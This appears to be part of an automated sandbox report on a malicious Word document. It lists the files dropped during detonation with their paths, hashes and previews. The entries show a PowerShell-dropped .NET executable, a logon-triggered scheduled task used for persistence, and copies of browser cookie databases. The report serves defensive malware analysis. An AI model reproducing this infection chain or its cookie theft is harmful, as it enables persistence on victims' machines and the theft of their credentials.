                                                                                                              MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                                                                              SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                                                                              SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                                                                              SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                                                                              Malicious:false
                                                                                                              Preview: [ZoneTransfer]..ZoneId=3..
                                                                                                              C:\Users\user\AppData\Local\Temp\tmp3054.tmp
                                                                                                              Process:C:\Users\user\AppData\Roaming\taskmg.exe
                                                                                                              File Type:XML 1.0 document, ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1575
                                                                                                              Entropy (8bit):5.117905043975538
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtWxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTav
                                                                                                              MD5:F5A0FC758800632A9CADD5E7E0FC7FA1
                                                                                                              SHA1:5E6F0BD54FDA0A2CE2929E290E6ADC4163BCE9B1
                                                                                                              SHA-256:4E940EAC9417D347B22F9D86C362B6C00EC2B7D2A69D628A71E899099F00A185
                                                                                                              SHA-512:0282523CEC0CFA09A687DC24C1D494EE889E072BDD16D3AE17DB9F66D1EAC174C1A38F616A4D190DD6129DEC18695C807A3FD11AE0DD4D16F43A501685662E98
                                                                                                              Malicious:true
                                                                                                              Preview: <?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                              C:\Users\user\AppData\Roaming\2wi3pnqf.bid\Chrome\Default\Cookies
                                                                                                              Process:C:\Users\user\AppData\Roaming\taskmg.exe
                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                              Category:dropped
                                                                                                              Size (bytes):28672
                                                                                                              Entropy (8bit):0.9650411582864293
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:T2loMLOpEO5J/KdGU1jX983Gul4kEBrvK5GYWgqRSESXh:inNww9t9wGAE
                                                                                                              MD5:903C35B27A5774A639A90D5332EEF8E0
                                                                                                              SHA1:5A8CE0B6C13D1AF00837AA6CA1AA39000D4EB7CF
                                                                                                              SHA-256:1159B5AE357F89C56FA23C14378FF728251E6BDE6EEA979F528DB11C4030BE74
                                                                                                              SHA-512:076BD35B0D59FFA7A52588332A862814DDF049EE59E27542A2DA10E7A5340758B8C8ED2DEFE78C5B5A89EE54C19A89D49D2B86B49BF5542D76C1D4A378B40277
                                                                                                              Malicious:false
                                                                                                              Preview: SQLite format 3......@ ..........................................................................C..........g...N......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Roaming\2wi3pnqf.bid\Firefox\Profiles\7xwghk55.default\cookies.sqlite
                                                                                                              Process:C:\Users\user\AppData\Roaming\taskmg.exe
                                                                                                              File Type:SQLite 3.x database, user version 7, last written using SQLite version 3017000
                                                                                                              Category:dropped
                                                                                                              Size (bytes):524288
                                                                                                              Entropy (8bit):0.08107860342777487
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:DO8rmWT8cl+fpNDId7r+gUEl1B6nB6UnUqc8AqwIhY5wXwwAVshT:DOUm7ii+7Ue1AQ98VVY
                                                                                                              MD5:1138F6578C48F43C5597EE203AFF5B27
                                                                                                              SHA1:9B55D0A511E7348E507D818B93F1C99986D33E7B
                                                                                                              SHA-256:EEEDF71E8E9A3A048022978336CA89A30E014AE481E73EF5011071462343FFBF
                                                                                                              SHA-512:6D6D7ECF025650D3E2358F5E2D17D1EC8D6231C7739B60A74B1D8E19D1B1966F5D88CC605463C3E26102D006E84D853E390FFED713971DC1D79EB1AB6E56585E
                                                                                                              Malicious:false
                                                                                                              Preview: SQLite format 3......@ ...........................................................................(.....}..~...}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Reconfirm The Details.LNK
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:56 2021, mtime=Mon Aug 30 20:08:56 2021, atime=Fri Nov 26 01:14:15 2021, length=393215, window=hide
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1069
                                                                                                              Entropy (8bit):4.580975445314464
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:8JuGb/XTTcLImuzUHheiclUvDv3qGniR7m:8JuI/XTAXu4HhaO+GiFm
                                                                                                              MD5:3FCECFD0FE72594F4F6E0F65A3EE4E5D
                                                                                                              SHA1:8660FB634C3AB41C385C9581CBD1D4057A18EA54
                                                                                                              SHA-256:57DEDF327857FC59B8D5BCB93CE2F0B55DD288B53B89206393AB75823A00CE2A
                                                                                                              SHA-512:755CE5A3F7DC93AEE0643B7E050FA839428BAD3DA63714512DC86D20338DB3E1DFD5A729248234B01BE6150D2F6F8F03336491C6CA0798B7283DF39124839C01
                                                                                                              Malicious:false
                                                                                                              Preview: L..................F.... ...4.h>...4.h>....~POk................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S....user.8......QK.X.S..*...&=....U...............A.l.b.u.s.....z.1......S!...Desktop.d......QK.X.S!.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....|.2.....zS.. .RECONF~1.DOC..`.......S...S..*.........................R.e.c.o.n.f.i.r.m. .T.h.e. .D.e.t.a.i.l.s...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\141700\Users.user\Desktop\Reconfirm The Details.doc.0.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.R.e.c.o.n.f.i.r.m. .T.h.e. .D.e.t.a.i.l.s...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......141700.........
                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):93
                                                                                                              Entropy (8bit):4.737415332721156
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:bDuMJlv2LQhk+UmX1zQQhk+Uv:bCk28hBLhY
                                                                                                              MD5:888B27FA8FB2022F87573241083A8C5B
                                                                                                              SHA1:419994E988722595417CDACA849241DFB646366F
                                                                                                              SHA-256:AE627F224CBF7D5A1B449A108B41AFDA558623C92E4A001A16059761D2000232
                                                                                                              SHA-512:54D6A0A3BBEDCB8D901CC66348FFA102F7F7403C07CFF24D77D9F7F8EF03D56AEC41B33B1B5B108C47650B7C0F1EDBB9563E3B97114999C260A020AE0E06F81E
                                                                                                              Malicious:false
                                                                                                              Preview: [folders]..Templates.LNK=0..Reconfirm The Details.LNK=0..[doc]..Reconfirm The Details.LNK=0..
                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):162
                                                                                                              Entropy (8bit):2.5038355507075254
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                                                              MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                                                              SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                                                              SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                                                              SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                                                              Malicious:false
                                                                                                              Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2
                                                                                                              Entropy (8bit):1.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Qn:Qn
                                                                                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                              Malicious:false
                                                                                                              Preview: ..
                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8016
                                                                                                              Entropy (8bit):3.5801138363759324
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:chQCQMqGqvsqvJCwo0iz8hQCQMqGqvsEHyqvJCwormizKAYDHxiKXX3lUVCiA2:cW7o0iz8WvHnormizKZiKXXriA2
                                                                                                              MD5:AAE46096174D979460091E4A6CF9B600
                                                                                                              SHA1:09FE7E96EFA17FCF1A9244BE0643E45C96C766F3
                                                                                                              SHA-256:EE253621EEE10EABCFD8BD0560CE745872924071DAE5FCBABC17D4F00CF25704
                                                                                                              SHA-512:433429676CFE542084E780BFE3BBAF83784EEEFB0900965D3C950720590213B67F2D5FC54774AB978F95A6C29099D6D445949E9D47E4D78CB859EEDB238FE125
                                                                                                              Malicious:false
                                                                                                              Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms. (copy)
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8016
                                                                                                              Entropy (8bit):3.5801138363759324
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:chQCQMqGqvsqvJCwo0iz8hQCQMqGqvsEHyqvJCwormizKAYDHxiKXX3lUVCiA2:cW7o0iz8WvHnormizKZiKXXriA2
                                                                                                              MD5:AAE46096174D979460091E4A6CF9B600
                                                                                                              SHA1:09FE7E96EFA17FCF1A9244BE0643E45C96C766F3
                                                                                                              SHA-256:EE253621EEE10EABCFD8BD0560CE745872924071DAE5FCBABC17D4F00CF25704
                                                                                                              SHA-512:433429676CFE542084E780BFE3BBAF83784EEEFB0900965D3C950720590213B67F2D5FC54774AB978F95A6C29099D6D445949E9D47E4D78CB859EEDB238FE125
                                                                                                              Malicious:false
                                                                                                              Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QOH1SFJ01YDJGSRFKM6L.temp
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8016
                                                                                                              Entropy (8bit):3.5801138363759324
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:chQCQMqGqvsqvJCwo0iz8hQCQMqGqvsEHyqvJCwormizKAYDHxiKXX3lUVCiA2:cW7o0iz8WvHnormizKZiKXXriA2
                                                                                                              MD5:AAE46096174D979460091E4A6CF9B600
                                                                                                              SHA1:09FE7E96EFA17FCF1A9244BE0643E45C96C766F3
                                                                                                              SHA-256:EE253621EEE10EABCFD8BD0560CE745872924071DAE5FCBABC17D4F00CF25704
                                                                                                              SHA-512:433429676CFE542084E780BFE3BBAF83784EEEFB0900965D3C950720590213B67F2D5FC54774AB978F95A6C29099D6D445949E9D47E4D78CB859EEDB238FE125
                                                                                                              Malicious:false
                                                                                                              Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SSOY99TCA63S5VSW1UNJ.temp
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8016
                                                                                                              Entropy (8bit):3.5801138363759324
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:chQCQMqGqvsqvJCwo0iz8hQCQMqGqvsEHyqvJCwormizKAYDHxiKXX3lUVCiA2:cW7o0iz8WvHnormizKZiKXXriA2
                                                                                                              MD5:AAE46096174D979460091E4A6CF9B600
                                                                                                              SHA1:09FE7E96EFA17FCF1A9244BE0643E45C96C766F3
                                                                                                              SHA-256:EE253621EEE10EABCFD8BD0560CE745872924071DAE5FCBABC17D4F00CF25704
                                                                                                              SHA-512:433429676CFE542084E780BFE3BBAF83784EEEFB0900965D3C950720590213B67F2D5FC54774AB978F95A6C29099D6D445949E9D47E4D78CB859EEDB238FE125
                                                                                                              Malicious:false
                                                                                                              Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SX36BOTN39J9C9J03BTG.temp
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8016
                                                                                                              Entropy (8bit):3.5818435904178987
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:chQCQMqGqvsqvJCwo0iz8hQCQMqGqvsEHyqvJCwormiztAKrVHxipxpyX3lUVCih:cW7o0iz8WvHnormizt5Pif8XriA2
                                                                                                              MD5:77F3843A1E78AA18EC48DEDA062DAA8C
                                                                                                              SHA1:23318033CE15969125FD192C56E3BE5955F77C74
                                                                                                              SHA-256:DEAFC5ECB755BBE38997255704446A06CDBB6B0BC77EA28C55C9EE8167171482
                                                                                                              SHA-512:E12E25FE49643FAD7D8EB33840D756DBA07B87A7288E2834C774CD3E54B256D5BD2DC2A8F86DEAEFBDAFFF7FF8CBEF7D41623877400279BEEC4A706F95149290
                                                                                                              Malicious:false
                                                                                                              Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\U7TXBSPCBZC5YKNEVYY5.temp
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8016
                                                                                                              Entropy (8bit):3.5801138363759324
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:chQCQMqGqvsqvJCwo0iz8hQCQMqGqvsEHyqvJCwormizKAYDHxiKXX3lUVCiA2:cW7o0iz8WvHnormizKZiKXXriA2
                                                                                                              MD5:AAE46096174D979460091E4A6CF9B600
                                                                                                              SHA1:09FE7E96EFA17FCF1A9244BE0643E45C96C766F3
                                                                                                              SHA-256:EE253621EEE10EABCFD8BD0560CE745872924071DAE5FCBABC17D4F00CF25704
                                                                                                              SHA-512:433429676CFE542084E780BFE3BBAF83784EEEFB0900965D3C950720590213B67F2D5FC54774AB978F95A6C29099D6D445949E9D47E4D78CB859EEDB238FE125
                                                                                                              Malicious:false
                                                                                                              Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8016
                                                                                                              Entropy (8bit):3.5818435904178987
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:chQCQMqGqvsqvJCwo0iz8hQCQMqGqvsEHyqvJCwormiztAKrVHxipxpyX3lUVCih:cW7o0iz8WvHnormizt5Pif8XriA2
                                                                                                              MD5:77F3843A1E78AA18EC48DEDA062DAA8C
                                                                                                              SHA1:23318033CE15969125FD192C56E3BE5955F77C74
                                                                                                              SHA-256:DEAFC5ECB755BBE38997255704446A06CDBB6B0BC77EA28C55C9EE8167171482
                                                                                                              SHA-512:E12E25FE49643FAD7D8EB33840D756DBA07B87A7288E2834C774CD3E54B256D5BD2DC2A8F86DEAEFBDAFFF7FF8CBEF7D41623877400279BEEC4A706F95149290
                                                                                                              Malicious:false
                                                                                                              Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                              C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe
                                                                                                              Process:C:\Users\user\AppData\Roaming\taskmg.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):777216
                                                                                                              Entropy (8bit):7.787171245644076
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:rBzcmhiTcQfDYWTRCFySBx5CC6Z0KbS7gdqszdlLhrpGreLM8vZw+JS1nHLE2D2W:rBomhiQYYWEFyw5USIHLu4vG7Hc95i11
                                                                                                              MD5:815982590DE5E574ABB8A0310826E200
                                                                                                              SHA1:6C41343A2E25F932F901E53E615CC083209F6A65
                                                                                                              SHA-256:56960095EA2EDA1C680F9DF0937A792E9BCA7AF4922931540688097E6D2A43BB
                                                                                                              SHA-512:4C343183EC50C6887B758ED1FA40478BC87A0944792944D42C9978EBDA94B08A9D2E3E77B039963BF0A3EC2D5090BBB7FBA9CF0486EBE8C00AC393A2361FCE98
                                                                                                              Malicious:true
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..a..............0.................. ........@.. .......................@............@.................................\...O............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........H...!..........Lj................................................s....}.....s ...}.....(!....(.....{.....o"...*.0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(*...-...........o.....*..................{....o+....{....o,...o-.....}....*.0..)........{.........(....t......|......(...+...3.*....0..)........{.........(0...t......|......(...+...3.*....0..........
                                                                                                              C:\Users\user\AppData\Roaming\taskmg.exe
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):777216
                                                                                                              Entropy (8bit):7.787171245644076
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:rBzcmhiTcQfDYWTRCFySBx5CC6Z0KbS7gdqszdlLhrpGreLM8vZw+JS1nHLE2D2W:rBomhiQYYWEFyw5USIHLu4vG7Hc95i11
                                                                                                              MD5:815982590DE5E574ABB8A0310826E200
                                                                                                              SHA1:6C41343A2E25F932F901E53E615CC083209F6A65
                                                                                                              SHA-256:56960095EA2EDA1C680F9DF0937A792E9BCA7AF4922931540688097E6D2A43BB
                                                                                                              SHA-512:4C343183EC50C6887B758ED1FA40478BC87A0944792944D42C9978EBDA94B08A9D2E3E77B039963BF0A3EC2D5090BBB7FBA9CF0486EBE8C00AC393A2361FCE98
                                                                                                              Malicious:true
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..a..............0.................. ........@.. .......................@............@.................................\...O............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........H...!..........Lj................................................s....}.....s ...}.....(!....(.....{.....o"...*.0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(*...-...........o.....*..................{....o+....{....o,...o-.....}....*.0..)........{.........(....t......|......(...+...3.*....0..)........{.........(0...t......|......(...+...3.*....0..........
                                                                                                              C:\Users\user\Desktop\~$confirm The Details.doc
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):162
                                                                                                              Entropy (8bit):2.5038355507075254
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
